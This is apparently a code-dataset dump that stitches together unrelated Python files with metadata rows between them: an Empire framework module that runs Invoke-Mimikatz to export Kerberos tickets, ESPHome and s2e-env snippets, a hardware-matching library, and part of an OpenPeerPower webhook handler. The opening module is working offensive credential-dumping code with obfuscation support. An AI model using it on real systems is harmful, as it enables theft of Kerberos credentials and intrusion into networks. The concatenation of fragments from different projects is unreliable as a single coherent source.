script += scriptEnd
# Get the random function name generated at install and patch the stager with the proper function name
conn = self.get_db_connection()
self.lock.acquire()
cur = conn.cursor()
cur.execute("SELECT Invoke_Mimikatz FROM functions")
replacement = cur.fetchone()
cur.close()
self.lock.release()
script = script.replace("Invoke-Mimikatz", replacement[0])
return script
| 34.707547 | 127 | 0.594183 | from __future__ import print_function
from builtins import str
from builtins import object
from lib.common import helpers
import threading
class Module(object):
    """Empire module wrapper that runs Invoke-Mimikatz to dump kerberos
    tickets from memory in base64-encoded form.

    The module reads the PowerSploit Invoke-Mimikatz source, appends the
    ticket-export command, and patches in the randomized function name
    stored in the backing database at install time.
    """

    def __init__(self, mainMenu, params=None):
        # Static metadata describing this module to the Empire framework.
        self.info = {
            'Name': 'Invoke-Mimikatz extract kerberos tickets.',

            'Author': ['@JosephBialek', '@gentilkiwi'],

            'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
                            "to extract kerberos tickets from memory in base64-encoded form."),

            'Background' : True,

            'OutputExtension' : None,

            'NeedsAdmin' : False,

            'OpsecSafe' : True,

            'Language' : 'powershell',

            'MinLanguageVersion' : '2',

            'Comments': [
                'http://clymb3r.wordpress.com/',
                'http://blog.gentilkiwi.com'
            ]
        }

        # Options settable at runtime; format is value_name ->
        # {Description, Required, Value}.
        self.options = {
            'Agent' : {
                'Description'   :   'Agent to run module on.',
                'Required'      :   True,
                'Value'         :   ''
            }
        }

        # save off a copy of the mainMenu object to access external
        # functionality like listeners/agent handlers/etc.
        self.mainMenu = mainMenu

        # protects self.mainMenu.conn during threaded listener access
        self.lock = threading.Lock()

        # NOTE: `params` defaults to None instead of a mutable [] so the
        # default is never shared between instances.
        for param in (params or []):
            # parameter format is [Name, Value]
            option, value = param
            if option in self.options:
                self.options[option]['Value'] = value

    # this might not be necessary. Could probably be achieved by just calling
    # mainmenu.get_db but all the other files have implemented it in place.
    # Might be worthwhile to just make a database handling file -Hubbl3
    def get_db_connection(self):
        """Return the shared DB connection with its row factory reset.

        The lock is held (and always released, even on error) while the
        shared connection object is mutated.
        """
        with self.lock:
            self.mainMenu.conn.row_factory = None
        return self.mainMenu.conn

    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Build and return the PowerShell script for this module.

        Returns an empty string when the module source cannot be read.
        """
        # read in the common module source code
        moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
        if obfuscate:
            helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
            moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")

        # `with` guarantees the file handle is closed; only I/O errors are
        # swallowed (the previous bare `except:` hid every failure).
        try:
            with open(moduleSource, 'r') as source_file:
                moduleCode = source_file.read()
        except (IOError, OSError):
            print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
            return ""

        script = moduleCode
        scriptEnd = "Invoke-Mimikatz -Command '\"standard::base64\" \"kerberos::list /export\"'"
        if obfuscate:
            scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
        script += scriptEnd

        # Get the random function name generated at install and patch the
        # stager with the proper function name.
        conn = self.get_db_connection()
        with self.lock:
            cur = conn.cursor()
            cur.execute("SELECT Invoke_Mimikatz FROM functions")
            replacement = cur.fetchone()
            cur.close()
        script = script.replace("Invoke-Mimikatz", replacement[0])
        return script
| true | true |
f70ffa952087ecc203a557dd249439198e434117 | 31 | py | Python | esphome/components/version/__init__.py | OttoWinter/esphomeyaml | 6a85259e4d6d1b0a0f819688b8e555efcb99ecb0 | [
"MIT"
] | 249 | 2018-04-07T12:04:11.000Z | 2019-01-25T01:11:34.000Z | esphome/components/adc/__init__.py | OttoWinter/esphomeyaml | 6a85259e4d6d1b0a0f819688b8e555efcb99ecb0 | [
"MIT"
] | 243 | 2018-04-11T16:37:11.000Z | 2019-01-25T16:50:37.000Z | esphome/components/md5/__init__.py | OttoWinter/esphomeyaml | 6a85259e4d6d1b0a0f819688b8e555efcb99ecb0 | [
"MIT"
] | 40 | 2018-04-10T05:50:14.000Z | 2019-01-25T15:20:36.000Z | CODEOWNERS = ["@esphome/core"]
# GitHub teams/users responsible for reviewing changes to this component.
CODEOWNERS = ["@esphome/core"]
| true | true |
f70ffac8915dec77e469e6bc0f0f06e1bcd32725 | 1,831 | py | Python | s2e_env/utils/repos.py | benquike/s2e-env | 3a71fee8f80b3318ad6b971c0bb42b5f60b27d8b | [
"BSD-3-Clause"
] | 55 | 2019-12-20T03:25:14.000Z | 2022-01-16T07:19:47.000Z | s2e_env/utils/repos.py | weizhou-chaojixx/s2e-env | ba72dac30a6db65f87fea13f275003791fcf4052 | [
"BSD-3-Clause"
] | 2 | 2020-11-02T08:01:00.000Z | 2022-03-27T02:59:18.000Z | s2e_env/utils/repos.py | weizhou-chaojixx/s2e-env | ba72dac30a6db65f87fea13f275003791fcf4052 | [
"BSD-3-Clause"
] | 11 | 2020-08-06T03:59:45.000Z | 2022-02-25T02:31:59.000Z | """
Copyright (c) 2017 Cyberhaven
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import logging
import os
import sys
from sh import git, ErrorReturnCode
from s2e_env import CONSTANTS
from s2e_env.command import CommandError
logger = logging.getLogger(__name__)
def git_clone(git_repo_url, git_repo_dir):
    """Clone ``git_repo_url`` into the local directory ``git_repo_dir``.

    The clone runs in the foreground with output streamed to the caller's
    stdout/stderr.

    Raises:
        CommandError: when the underlying ``git clone`` exits non-zero.
    """
    try:
        logger.info('Fetching from %s to %s', git_repo_url, git_repo_dir)
        # _fg=True runs git in the foreground so clone progress is visible
        git.clone(git_repo_url, git_repo_dir, _out=sys.stdout,
                  _err=sys.stderr, _fg=True)
    except ErrorReturnCode as e:
        # Translate the sh-level failure into the project's CommandError
        raise CommandError(e)
def git_clone_to_source(env_path, git_repo):
    """Clone repository ``git_repo`` into ``<env_path>/source/<git_repo>``.

    The repository URL base is taken from ``CONSTANTS['repos']['url']``.
    """
    git_url = CONSTANTS['repos']['url']
    git_repo_dir = os.path.join(env_path, 'source', git_repo)
    git_repo_url = '%s/%s' % (git_url, git_repo)
    git_clone(git_repo_url, git_repo_dir)
    logger.success('Fetched %s', git_repo)
| 35.211538 | 78 | 0.761879 |
import logging
import os
import sys
from sh import git, ErrorReturnCode
from s2e_env import CONSTANTS
from s2e_env.command import CommandError
logger = logging.getLogger(__name__)
def git_clone(git_repo_url, git_repo_dir):
    """Clone ``git_repo_url`` into ``git_repo_dir``.

    Runs in the foreground, streaming git output to stdout/stderr.

    Raises:
        CommandError: when ``git clone`` fails.
    """
    try:
        logger.info('Fetching from %s to %s', git_repo_url, git_repo_dir)
        # _fg=True: foreground execution so the user sees clone progress
        git.clone(git_repo_url, git_repo_dir, _out=sys.stdout,
                  _err=sys.stderr, _fg=True)
    except ErrorReturnCode as e:
        # Wrap the sh failure in the project's CommandError
        raise CommandError(e)
def git_clone_to_source(env_path, git_repo):
    """Clone repository ``git_repo`` into ``<env_path>/source/<git_repo>``."""
    base_url = CONSTANTS['repos']['url']
    dest_dir = os.path.join(env_path, 'source', git_repo)
    repo_url = '%s/%s' % (base_url, git_repo)
    git_clone(repo_url, dest_dir)
    logger.success('Fetched %s', git_repo)
| true | true |
f70ffae33736b36285853cfb6a7d24af8048216a | 9,322 | py | Python | hardware/matcher.py | jacek-jablonski/hardware | 4447a07609b54ff1a0eea0f07c75030e5752afe2 | [
"Apache-2.0"
] | null | null | null | hardware/matcher.py | jacek-jablonski/hardware | 4447a07609b54ff1a0eea0f07c75030e5752afe2 | [
"Apache-2.0"
] | null | null | null | hardware/matcher.py | jacek-jablonski/hardware | 4447a07609b54ff1a0eea0f07c75030e5752afe2 | [
"Apache-2.0"
] | 1 | 2019-10-05T13:19:25.000Z | 2019-10-05T13:19:25.000Z | #
# Copyright (C) 2013-2015 eNovance SAS <licensing@enovance.com>
#
# Author: Frederic Lepied <frederic.lepied@enovance.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
'''Functions to match according to a requirement specification.'''
import ipaddress
import logging
import re
import sys
LOG = logging.getLogger('hardware.matcher')
def _adder(array, index, value):
'Auxiliary function to add a value to an array.'
array[index] = value
def _appender(array, index, value):
'Auxiliary function to append a value to an array.'
try:
array[index].append(value)
except KeyError:
array[index] = [value, ]
def _range(elt, minval, maxval):
'Helper for match_spec.'
return float(elt) >= float(minval) and float(elt) <= float(maxval)
def _gt(left, right):
'Helper for match_spec.'
return float(left) > float(right)
def _ge(left, right):
'Helper for match_spec.'
return float(left) >= float(right)
def _lt(left, right):
'Helper for match_spec.'
return float(left) < float(right)
def _le(left, right):
'Helper for match_spec.'
return float(left) <= float(right)
def _not(_, right):
'Helper for match_spec.'
return not right
def _and(_, left, right):
'Helper for match_spec.'
return left and right
def _or(_, left, right):
'Helper for match_spec.'
return left or right
def _network(left, right):
'Helper for match_spec.'
return ipaddress.IPv4Address(left) in ipaddress.IPv4Network(right)
def _regexp(left, right):
'Helper for match_spec.'
return re.search(right, left) is not None
def _in(elt, *lst):
'Helper for match_spec.'
return elt in lst
# Parses expressions of the form "name(arg1[, arg2, ...])":
# group(1) = function name, group(2) = first argument,
# group(3) = remaining comma-separated arguments (may be None).
_FUNC_REGEXP = re.compile(r'^([^(]+)'          # function name
                          r'\(\s*([^,]+)'      # first argument
                          r'(?:\s*,\s*(.+))?'  # remaining optional arguments
                          r'\)$')              # last parenthesis
def _call_func(func, implicit, res):
    """Invoke matcher helper *func* with arguments parsed from regex *res*.

    *implicit* is the value the spec is being matched against; it is always
    passed as the first argument.  Each textual argument is itself evaluated
    through _extract_result, so nested function calls are supported (the two
    functions are mutually recursive).
    """
    args = [implicit, res.group(2)]
    # split the optional arguments if we have some
    if res.group(3):
        args = args + re.split(r'\s*,\s*', res.group(3))
    # remove strings delimiters
    args = [x.strip('\'"') for x in args]
    # evaluate each argument (may recurse into _call_func via nested calls)
    args = [_extract_result(implicit, x) for x in args]
    return func(*args)
def _extract_result(implicit, expr):
    """Evaluate *expr*: run it as a matcher helper call when it looks like
    ``name(args)`` and ``_name`` exists in this module; otherwise return the
    expression text unchanged."""
    parsed = _FUNC_REGEXP.search(expr)
    if parsed is None:
        return expr
    helper = globals().get('_' + parsed.group(1))
    if helper is None:
        return expr
    return _call_func(helper, implicit, parsed)
def match_spec(spec, lines, arr, adder=_adder):
    """Match one line of *lines* against the 4-tuple *spec*.

    Spec elements may be literal strings, "$var" variables, "func(...)"
    helper calls, or "$var=func(...)" combinations.  Captured variables are
    stored into *arr* via *adder*.  On success the matched line is REMOVED
    from *lines* (so it cannot match again) and returned; otherwise False.
    """
    # match a line without variable
    for idx in range(len(lines)):
        if lines[idx] == spec:
            res = lines[idx]
            del lines[idx]
            return res
    # match a line with a variable, a function or both
    for lidx in range(len(lines)):
        line = lines[lidx]
        varidx = []
        for idx in range(4):
            # try to split the variable and function parts if we have both
            if spec[idx][0] == '$':
                parts = spec[idx].split('=')
                if len(parts) == 2:
                    var, func = parts
                    matched = False
                else:
                    var = func = spec[idx]
            else:
                var = func = spec[idx]
            # Match a function
            if func[-1] == ')':
                res = _FUNC_REGEXP.search(func)
                if res:
                    func_name = '_' + res.group(1)
                    if func_name in globals():
                        if not _call_func(globals()[func_name],
                                          line[idx], res):
                            if var == func:
                                break
                        else:
                            if var == func:
                                continue
                            matched = True
                    else:
                        if var == func:
                            break
            # Match a variable (either a bare "$var" or a "$var=func()" whose
            # function part already matched above)
            if ((var == func) or (var != func and matched)) and var[0] == '$':
                # a variable already bound to a different value is a mismatch
                if adder == _adder and var[1:] in arr:
                    if arr[var[1:]] != line[idx]:
                        break
                varidx.append((idx, var[1:]))
            # Match the full string
            elif line[idx] != spec[idx]:
                break
        else:
            # for/else: all 4 elements matched -> commit captured variables
            for i, var in varidx:
                adder(arr, var, line[i])
            res = lines[lidx]
            del lines[lidx]
            return res
    return False
def match_all(lines, specs, arr, arr2, debug=False, level=0):
    '''Match all lines according to a spec.

    Store variables starting with a $ in <arr>. Variables starting with
    2 $ like $$vda are stored in arr and arr2.

    Returns True when every spec matched some line, False otherwise.
    '''
    # Work on a copy of lines to avoid changing the real lines because
    # match_spec removes the matched line to not match it again on next
    # calls.
    lines = list(lines)
    specs = list(specs)
    copy_arr = dict(arr)
    points = []
    # Prevent infinite loops
    if level == 50:
        return False
    # Match lines using specs
    while len(specs) > 0:
        copy_specs = list(specs)
        spec = specs.pop(0)
        line = match_spec(spec, lines, arr)
        if debug:
            sys.stderr.write('match_spec: %s %s\n' % (line, spec))
        # No match
        if not line:
            # Backtrack on the backtracking points
            while len(points) > 0:
                lines, specs, new_arr = points.pop()
                if debug:
                    sys.stderr.write('retrying with: %s\n' %
                                     (new_arr,))
                if match_all(lines, specs, new_arr, arr2, debug, level + 1):
                    # Copy arr back
                    for k in new_arr:
                        arr[k] = new_arr[k]
                    if debug:
                        sys.stderr.write('success: %d\n' % level)
                    return True
            if level == 0 and debug:
                sys.stderr.write('spec: %s not matched\n' % str(spec))
            return False
        else:
            # Store backtracking points when we find a new variable
            if arr != copy_arr:
                copy_lines = list(lines)
                # Put the matching line at the end of the lines
                copy_lines.append(line)
                points.append((copy_lines, copy_specs, copy_arr))
                copy_arr = dict(arr)
                if debug:
                    sys.stderr.write('new var: %s %s\n' % (arr, line))
    # Manage $$ variables.  Iterate over a snapshot of the keys because we
    # delete entries while walking: mutating a dict during direct iteration
    # raises RuntimeError on Python 3.
    for key in list(arr):
        if key[0] == '$':
            nkey = key[1:]
            arr[nkey] = arr[key]
            arr2[nkey] = arr[key]
            del arr[key]
    return True
def match_multiple(lines, spec, arr):
    """Apply *spec* repeatedly to a copy of *lines*, gathering every match.

    Captured variables are appended into lists inside *arr*.  Returns True
    when at least one line matched.
    """
    remaining = list(lines)
    matched_any = False
    while match_spec(spec, remaining, arr, adder=_appender):
        matched_any = True
    return matched_any
def generate_filename_and_macs(items):
    '''Generate a file name for a hardware using DMI information.

    (product name and version) then if the DMI serial number is
    available we use it unless we lookup the first mac address.

    As a result, we do have a filename like :

    <dmi_product_name>-<dmi_product_version>-{dmi_serial_num|mac_address}
    '''
    # Duplicate items as it will be modified by match_* functions
    hw_items = list(items)
    sysvars = {}
    sysvars['sysname'] = ''

    if match_spec(('system', 'product', 'vendor', '$sysprodvendor'),
                  hw_items, sysvars):
        sysvars['sysname'] += (re.sub(r'\W+', '', sysvars['sysprodvendor']) +
                               '-')

    # NOTE(review): this uses '=' (not '+='), so a matching product name
    # REPLACES the vendor prefix added above instead of appending to it.
    # The vendor match still captures $sysprodvendor. Confirm this is the
    # intended precedence before changing it.
    if match_spec(('system', 'product', 'name', '$sysprodname'),
                  hw_items, sysvars):
        sysvars['sysname'] = re.sub(r'\W+', '', sysvars['sysprodname']) + '-'

    # Let's use any existing DMI serial number or take the first mac address
    if match_spec(('system', 'product', 'serial', '$sysserial'),
                  hw_items, sysvars):
        sysvars['sysname'] += re.sub(r'\W+', '', sysvars['sysserial']) + '-'

    # we always need to have the mac addresses for pxemngr
    if match_multiple(hw_items,
                      ('network', '$eth', 'serial', '$serial'),
                      sysvars):
        sysvars['sysname'] += sysvars['serial'][0].replace(':', '-')
    else:
        LOG.warning('unable to detect network macs')

    return sysvars
# matcher.py ends here
| 31.281879 | 78 | 0.548487 |
import ipaddress
import logging
import re
import sys
LOG = logging.getLogger('hardware.matcher')
def _adder(array, index, value):
    """Store *value* under *index* in *array* (overwrites)."""
    array[index] = value
def _appender(array, index, value):
    """Append *value* to the list at *array[index]*, creating it if absent."""
    try:
        array[index].append(value)
    except KeyError:
        array[index] = [value, ]
def _range(elt, minval, maxval):
    """True when *elt* is within the inclusive numeric range."""
    return float(elt) >= float(minval) and float(elt) <= float(maxval)
def _gt(left, right):
    """Numeric strictly-greater-than."""
    return float(left) > float(right)
def _ge(left, right):
    """Numeric greater-than-or-equal."""
    return float(left) >= float(right)
def _lt(left, right):
    """Numeric strictly-less-than."""
    return float(left) < float(right)
def _le(left, right):
    """Numeric less-than-or-equal."""
    return float(left) <= float(right)
def _not(_, right):
    """Boolean negation of *right* (first argument ignored)."""
    return not right
def _and(_, left, right):
    """Short-circuit ``and`` of *left*/*right* (first argument ignored)."""
    return left and right
def _or(_, left, right):
    """Short-circuit ``or`` of *left*/*right* (first argument ignored)."""
    return left or right
def _network(left, right):
    """True when IPv4 address *left* is inside IPv4 network *right*."""
    return ipaddress.IPv4Address(left) in ipaddress.IPv4Network(right)
def _regexp(left, right):
    """True when regex *right* matches somewhere in *left*."""
    return re.search(right, left) is not None
def _in(elt, *lst):
    """True when *elt* equals one of the remaining arguments."""
    return elt in lst
# Parses "name(arg1[, arg2, ...])": group(1)=function name,
# group(2)=first argument, group(3)=remaining arguments (may be None).
_FUNC_REGEXP = re.compile(r'^([^(]+)'          # function name
                          r'\(\s*([^,]+)'      # first argument
                          r'(?:\s*,\s*(.+))?'  # remaining optional arguments
                          r'\)$')              # closing parenthesis
def _call_func(func, implicit, res):
    """Invoke matcher helper *func* with arguments parsed from regex *res*.

    *implicit* (the value being matched) is always the first argument.
    Arguments are stripped of quote delimiters, then each is evaluated via
    _extract_result, so nested helper calls work (mutual recursion).
    """
    args = [implicit, res.group(2)]
    # append the optional comma-separated arguments when present
    if res.group(3):
        args = args + re.split(r'\s*,\s*', res.group(3))
    # remove string delimiters
    args = [x.strip('\'"') for x in args]
    # call function
    args = [_extract_result(implicit, x) for x in args]
    return func(*args)
def _extract_result(implicit, expr):
    """Evaluate *expr*: run it as a helper call when it looks like
    ``name(args)`` and ``_name`` exists in this module; otherwise return
    the expression text unchanged."""
    res = _FUNC_REGEXP.search(expr)
    if res:
        func_name = '_' + res.group(1)
        # helpers are looked up dynamically by prefixed name
        if func_name in globals():
            return _call_func(globals()[func_name], implicit, res)
        else:
            return expr
    else:
        return expr
def match_spec(spec, lines, arr, adder=_adder):
    """Match one line of *lines* against the 4-tuple *spec*.

    Spec elements may be literals, "$var" variables, "func(...)" helper
    calls, or "$var=func(...)" combinations.  Captured variables are stored
    into *arr* via *adder*.  On success the matched line is REMOVED from
    *lines* and returned; otherwise False is returned.
    """
    # match a line without variable
    for idx in range(len(lines)):
        if lines[idx] == spec:
            res = lines[idx]
            del lines[idx]
            return res
    # match a line with a variable, a function or both
    for lidx in range(len(lines)):
        line = lines[lidx]
        varidx = []
        for idx in range(4):
            # try to split the variable and function parts if we have both
            if spec[idx][0] == '$':
                parts = spec[idx].split('=')
                if len(parts) == 2:
                    var, func = parts
                    matched = False
                else:
                    var = func = spec[idx]
            else:
                var = func = spec[idx]
            # Match a function
            if func[-1] == ')':
                res = _FUNC_REGEXP.search(func)
                if res:
                    func_name = '_' + res.group(1)
                    if func_name in globals():
                        if not _call_func(globals()[func_name],
                                          line[idx], res):
                            if var == func:
                                break
                        else:
                            if var == func:
                                continue
                            matched = True
                    else:
                        if var == func:
                            break
            # Match a variable (bare "$var", or "$var=func()" whose function
            # part matched above)
            if ((var == func) or (var != func and matched)) and var[0] == '$':
                # a variable already bound to a different value is a mismatch
                if adder == _adder and var[1:] in arr:
                    if arr[var[1:]] != line[idx]:
                        break
                varidx.append((idx, var[1:]))
            # Match the full string
            elif line[idx] != spec[idx]:
                break
        else:
            # for/else: all 4 elements matched -> commit captured variables
            for i, var in varidx:
                adder(arr, var, line[i])
            res = lines[lidx]
            del lines[lidx]
            return res
    return False
def match_all(lines, specs, arr, arr2, debug=False, level=0):
    """Match every spec in *specs* against *lines*, with backtracking.

    Variables starting with '$' are stored in *arr*; variables starting
    with '$$' (e.g. $$vda) end up in both *arr* and *arr2*.  Returns True
    when all specs matched, False otherwise.
    """
    # Work on a copy of lines to avoid changing the real lines because
    # match_spec removes the matched line to not match it again on next
    # calls.
    lines = list(lines)
    specs = list(specs)
    copy_arr = dict(arr)
    points = []
    # Prevent infinite loops
    if level == 50:
        return False
    # Match lines using specs
    while len(specs) > 0:
        copy_specs = list(specs)
        spec = specs.pop(0)
        line = match_spec(spec, lines, arr)
        if debug:
            sys.stderr.write('match_spec: %s %s\n' % (line, spec))
        # No match
        if not line:
            # Backtrack on the backtracking points
            while len(points) > 0:
                lines, specs, new_arr = points.pop()
                if debug:
                    sys.stderr.write('retrying with: %s\n' %
                                     (new_arr,))
                if match_all(lines, specs, new_arr, arr2, debug, level + 1):
                    # Copy arr back
                    for k in new_arr:
                        arr[k] = new_arr[k]
                    if debug:
                        sys.stderr.write('success: %d\n' % level)
                    return True
            if level == 0 and debug:
                sys.stderr.write('spec: %s not matched\n' % str(spec))
            return False
        else:
            # Store backtracking points when we find a new variable
            if arr != copy_arr:
                copy_lines = list(lines)
                # Put the matching line at the end of the lines
                copy_lines.append(line)
                points.append((copy_lines, copy_specs, copy_arr))
                copy_arr = dict(arr)
                if debug:
                    sys.stderr.write('new var: %s %s\n' % (arr, line))
    # Manage $$ variables.  Iterate a snapshot of the keys because entries
    # are deleted while walking: mutating a dict during direct iteration
    # raises RuntimeError on Python 3.
    for key in list(arr):
        if key[0] == '$':
            nkey = key[1:]
            arr[nkey] = arr[key]
            arr2[nkey] = arr[key]
            del arr[key]
    return True
def match_multiple(lines, spec, arr):
    """Apply *spec* repeatedly to a copy of *lines*, collecting every match.

    Captured variables accumulate as lists in *arr*.  Returns True when at
    least one line matched.
    """
    remaining = list(lines)
    matched_any = False
    while match_spec(spec, remaining, arr, adder=_appender):
        matched_any = True
    return matched_any
def generate_filename_and_macs(items):
    """Generate a hardware file name from DMI information.

    Builds a name like
    ``<vendor|product_name>-<dmi_serial>-<first-mac-with-dashes>`` out of the
    matched DMI vendor/product/serial entries plus the first detected NIC
    MAC address.  Returns the dict of captured variables including
    ``sysname``.
    """
    # Duplicate items as it will be modified by match_* functions
    hw_items = list(items)
    sysvars = {}
    sysvars['sysname'] = ''
    if match_spec(('system', 'product', 'vendor', '$sysprodvendor'),
                  hw_items, sysvars):
        sysvars['sysname'] += (re.sub(r'\W+', '', sysvars['sysprodvendor']) +
                               '-')
    # NOTE(review): '=' (not '+=') means a matching product name REPLACES
    # the vendor prefix added above — confirm this precedence is intended.
    if match_spec(('system', 'product', 'name', '$sysprodname'),
                  hw_items, sysvars):
        sysvars['sysname'] = re.sub(r'\W+', '', sysvars['sysprodname']) + '-'
    # Use any existing DMI serial number as the next name component
    if match_spec(('system', 'product', 'serial', '$sysserial'),
                  hw_items, sysvars):
        sysvars['sysname'] += re.sub(r'\W+', '', sysvars['sysserial']) + '-'
    # we always need the mac addresses for pxemngr
    if match_multiple(hw_items,
                      ('network', '$eth', 'serial', '$serial'),
                      sysvars):
        sysvars['sysname'] += sysvars['serial'][0].replace(':', '-')
    else:
        LOG.warning('unable to detect network macs')
    return sysvars
| true | true |
f70ffb5207b57f675a7239f3cd40636f10b65be5 | 15,741 | py | Python | openpeerpower/components/mobile_app/webhook.py | OpenPeerPower/openpeerpower | 940a04a88e8f78e2d010dc912ad6905ae363503c | [
"Apache-2.0"
] | null | null | null | openpeerpower/components/mobile_app/webhook.py | OpenPeerPower/openpeerpower | 940a04a88e8f78e2d010dc912ad6905ae363503c | [
"Apache-2.0"
] | null | null | null | openpeerpower/components/mobile_app/webhook.py | OpenPeerPower/openpeerpower | 940a04a88e8f78e2d010dc912ad6905ae363503c | [
"Apache-2.0"
] | 1 | 2019-04-24T14:10:08.000Z | 2019-04-24T14:10:08.000Z | """Webhook handlers for mobile_app."""
from functools import wraps
import logging
import secrets
from aiohttp.web import HTTPBadRequest, Request, Response, json_response
from nacl.secret import SecretBox
import voluptuous as vol
from openpeerpower.components.binary_sensor import (
DEVICE_CLASSES as BINARY_SENSOR_CLASSES,
)
from openpeerpower.components.device_tracker import (
ATTR_BATTERY,
ATTR_GPS,
ATTR_GPS_ACCURACY,
ATTR_LOCATION_NAME,
)
from openpeerpower.components.frontend import MANIFEST_JSON
from openpeerpower.components.sensor import DEVICE_CLASSES as SENSOR_CLASSES
from openpeerpower.components.zone.const import DOMAIN as ZONE_DOMAIN
from openpeerpower.const import (
ATTR_DOMAIN,
ATTR_SERVICE,
ATTR_SERVICE_DATA,
CONF_WEBHOOK_ID,
HTTP_BAD_REQUEST,
HTTP_CREATED,
)
from openpeerpower.core import EventOrigin
from openpeerpower.exceptions import OpenPeerPowerError, ServiceNotFound, TemplateError
from openpeerpower.helpers import config_validation as cv, device_registry as dr
from openpeerpower.helpers.dispatcher import async_dispatcher_send
from openpeerpower.helpers.template import attach
from openpeerpower.helpers.typing import OpenPeerPowerType
from openpeerpower.util.decorator import Registry
from .const import (
ATTR_ALTITUDE,
ATTR_APP_DATA,
ATTR_APP_VERSION,
ATTR_COURSE,
ATTR_DEVICE_ID,
ATTR_DEVICE_NAME,
ATTR_EVENT_DATA,
ATTR_EVENT_TYPE,
ATTR_MANUFACTURER,
ATTR_MODEL,
ATTR_OS_VERSION,
ATTR_SENSOR_ATTRIBUTES,
ATTR_SENSOR_DEVICE_CLASS,
ATTR_SENSOR_ICON,
ATTR_SENSOR_NAME,
ATTR_SENSOR_STATE,
ATTR_SENSOR_TYPE,
ATTR_SENSOR_TYPE_BINARY_SENSOR,
ATTR_SENSOR_TYPE_SENSOR,
ATTR_SENSOR_UNIQUE_ID,
ATTR_SENSOR_UOM,
ATTR_SPEED,
ATTR_SUPPORTS_ENCRYPTION,
ATTR_TEMPLATE,
ATTR_TEMPLATE_VARIABLES,
ATTR_VERTICAL_ACCURACY,
ATTR_WEBHOOK_DATA,
ATTR_WEBHOOK_ENCRYPTED,
ATTR_WEBHOOK_ENCRYPTED_DATA,
ATTR_WEBHOOK_TYPE,
CONF_CLOUDHOOK_URL,
CONF_REMOTE_UI_URL,
CONF_SECRET,
DATA_CONFIG_ENTRIES,
DATA_DELETED_IDS,
DATA_STORE,
DOMAIN,
ERR_ENCRYPTION_ALREADY_ENABLED,
ERR_ENCRYPTION_NOT_AVAILABLE,
ERR_ENCRYPTION_REQUIRED,
ERR_SENSOR_DUPLICATE_UNIQUE_ID,
ERR_SENSOR_NOT_REGISTERED,
SIGNAL_LOCATION_UPDATE,
SIGNAL_SENSOR_UPDATE,
)
from .helpers import (
_decrypt_payload,
empty_okay_response,
error_response,
registration_context,
safe_registration,
savable_state,
supports_encryption,
webhook_response,
)
_LOGGER = logging.getLogger(__name__)
WEBHOOK_COMMANDS = Registry()
COMBINED_CLASSES = set(BINARY_SENSOR_CLASSES + SENSOR_CLASSES)
SENSOR_TYPES = [ATTR_SENSOR_TYPE_BINARY_SENSOR, ATTR_SENSOR_TYPE_SENSOR]
# Envelope schema for every incoming webhook payload: a command type, its
# data, and optional encryption fields for encrypted registrations.
WEBHOOK_PAYLOAD_SCHEMA = vol.Schema(
    {
        vol.Required(ATTR_WEBHOOK_TYPE): cv.string,
        vol.Required(ATTR_WEBHOOK_DATA, default={}): vol.Any(dict, list),
        vol.Optional(ATTR_WEBHOOK_ENCRYPTED, default=False): cv.boolean,
        vol.Optional(ATTR_WEBHOOK_ENCRYPTED_DATA): cv.string,
    }
)
def validate_schema(schema):
    """Decorate a webhook handler so its payload is validated by *schema*.

    A plain dict is wrapped in a voluptuous Schema.  Invalid payloads are
    logged and answered with an empty OK response instead of reaching the
    handler.
    """
    if isinstance(schema, dict):
        schema = vol.Schema(schema)
    def wrapper(func):
        """Wrap function so we validate schema."""
        @wraps(func)
        async def validate_and_run(opp, config_entry, data):
            """Validate input and call handler."""
            try:
                data = schema(data)
            except vol.Invalid as ex:
                err = vol.humanize.humanize_error(data, ex)
                _LOGGER.error("Received invalid webhook payload: %s", err)
                # answer with an empty OK response rather than an error
                return empty_okay_response()
            return await func(opp, config_entry, data)
        return validate_and_run
    return wrapper
async def handle_webhook(
    opp: OpenPeerPowerType, webhook_id: str, request: Request
) -> Response:
    """Handle webhook callback.

    Validates the envelope, optionally decrypts the payload, and dispatches
    to the registered command handler for the payload's webhook type.
    """
    # 410 Gone tells the app this registration was deleted server-side
    if webhook_id in opp.data[DOMAIN][DATA_DELETED_IDS]:
        return Response(status=410)
    config_entry = opp.data[DOMAIN][DATA_CONFIG_ENTRIES][webhook_id]
    try:
        req_data = await request.json()
    except ValueError:
        _LOGGER.warning("Received invalid JSON from mobile_app")
        return empty_okay_response(status=HTTP_BAD_REQUEST)
    # registrations that enabled encryption must not fall back to plaintext
    if (
        ATTR_WEBHOOK_ENCRYPTED not in req_data
        and config_entry.data[ATTR_SUPPORTS_ENCRYPTION]
    ):
        _LOGGER.warning(
            "Refusing to accept unencrypted webhook from %s",
